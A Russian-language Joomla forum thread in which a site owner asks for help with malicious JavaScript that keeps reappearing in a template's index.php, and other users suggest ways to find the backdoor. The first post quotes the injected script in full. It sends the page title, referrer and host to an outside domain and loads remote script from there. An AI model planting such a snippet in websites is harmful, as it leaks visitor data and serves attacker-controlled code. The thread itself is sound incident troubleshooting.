0 Пользователей и 1 Гость просматривают эту тему.
  • 10 Ответов
  • 1086 Просмотров
*

webwin12

  • Новичок
  • 5
  • 0
Вот такой кусок ***-кода прописывается в index.php шаблона каждый раз после его удаления.   

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://RUBYROCKINGCHAIR.COM/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
</head>

Joomla 2.5.28
Сторонние компоненты: K2 Version 2.6.8, Phoca Maps. Модули: ARI Image Slider, Sj Contact AJAX.
Дата последнего входа в панель управления: 2015-11-19 20:54:05 - реально не был в это время.
Что делал пять дней назад:
Проверял на base64 файлы и сканил антивиром, айболитом, ничего не обнаружил.
Удалил *** код, поменял все пароли какие можно, запретил доступ в админку через htaccess (только по айпи).
Тишина дней пять, теперь опять.
Что делать? Где копать?    !

*

voland

  • Профи
  • 9524
  • 422
  • Эта строка съедает место на вашем мониторе
*

webwin12

  • Новичок
  • 5
  • 0
Нет не варез.
*

voland

  • Профи
  • 9524
  • 422
  • Эта строка съедает место на вашем мониторе
Хм.. 15 баксов смартаддонс платили?
*

webwin12

  • Новичок
  • 5
  • 0
Вы про Sj Contact AJAX, затрудняюсь ответить т.к. сайт достался по наследству. Так в чём может быть причина?
*

voland

  • Профи
  • 9524
  • 422
  • Эта строка съедает место на вашем мониторе
В том что сами установили бэкдор или тот кто сайт делал.
*

draff

  • Практически профи
  • 2779
  • 174
  • step by step
Смотреть в логах хостинга запросы POST и проверять каждый файл, к которому запрос
Удалю вирус с сайта. Тема в коммерческом разделе
Создам плагин , модуль под заказ для VirtueMart , JoomShopping
*

wishlight

  • Профи
  • 3635
  • 223
  • skype aqaus.com
Выставьте Айболит на параноидальный уровень проверки и проверьте. Что-то по любому есть. Хотя может заражаться с других сайтов аккаунта если такие есть. Securitycheck можно поставить и проверить в его списке уязвимости расширений.
*

webwin12

  • Новичок
  • 5
  • 0
Выставьте Айболит на параноидальный уровень проверки и проверьте. Что-то по любому есть. Хотя может заражаться с других сайтов аккаунта если такие есть. Securitycheck можно поставить и проверить в его списке уязвимости расширений.
Спасибо за наводку, так оно и было т.е. был тестовый поддомен типа test.site.ru, его не юзали вообще года два наверное, там была Joomla старой версии вообще 1.5.... Короче что там было долго объяснять, кошмар одним словом, куча левых файлов типа  defines.php.suspected прям в корне. Еще раз спасибо!
*

webwin12

  • Новичок
  • 5
  • 0
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Редирект с мобильных устройств, вирус на сайте

Автор liv

Ответов: 6
Просмотров: 65
Последний ответ 20.09.2017, 12:49:10
от wishlight
Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

Ответов: 99
Просмотров: 46771
Последний ответ 05.07.2017, 15:18:57
от revisium
Вирус в виде рекламы на сайте

Автор yasna

Ответов: 10
Просмотров: 305
Последний ответ 08.06.2017, 18:38:43
от winstrool
Вирус на сайте, редирект, что делать как лечить!

Автор flyingspook

Ответов: 790
Просмотров: 219322
Последний ответ 23.05.2017, 23:22:56
от AlekVolsk
Вирус на сайте J 1.5

Автор 12mv

Ответов: 15
Просмотров: 445
Последний ответ 13.05.2017, 18:58:27
от 12mv